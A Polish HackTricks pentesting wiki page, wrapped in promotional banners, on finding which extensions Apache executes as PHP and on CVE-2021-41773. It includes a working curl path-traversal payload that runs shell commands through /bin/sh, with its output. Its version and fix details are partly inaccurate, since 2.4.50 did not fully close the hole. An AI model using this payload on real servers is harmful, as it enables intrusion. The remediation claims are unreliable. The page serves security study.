4 KiB
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
Wykonywalne rozszerzenia PHP
Sprawdź, które rozszerzenia wykonuje serwer Apache. Aby je wyszukać, możesz wykonać:
grep -R -B1 "httpd-php" /etc/apache2
Również, niektóre miejsca, gdzie można znaleźć tę konfigurację to:
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf
Opis
CVE-2021-41773 to podatność w serwerze Apache HTTP Server, która umożliwia zdalne wykonanie kodu. Podatność ta została odkryta we wrześniu 2021 roku i dotyczy wersji Apache 2.4.49 i wcześniejszych.
Wykorzystanie
Atakujący może wykorzystać tę podatność, wysyłając specjalnie spreparowane żądanie HTTP GET do serwera Apache. W wyniku tego serwer może ujawnić zawartość dowolnego pliku na systemie, do którego ma dostęp użytkownik, który uruchamia serwer Apache.
Naprawa
Aby naprawić tę podatność, należy zaktualizować serwer Apache do wersji 2.4.50 lub nowszej. W przypadku niemożności aktualizacji, można zastosować tymczasowe rozwiązanie, polegające na dodaniu reguły do pliku konfiguracyjnego serwera, która blokuje dostęp do niebezpiecznych ścieżek.
<DirectoryMatch "^/.*/\..*">
Require all denied
</DirectoryMatch>
Referencje
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
- https://httpd.apache.org/security/vulnerabilities_24.html
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.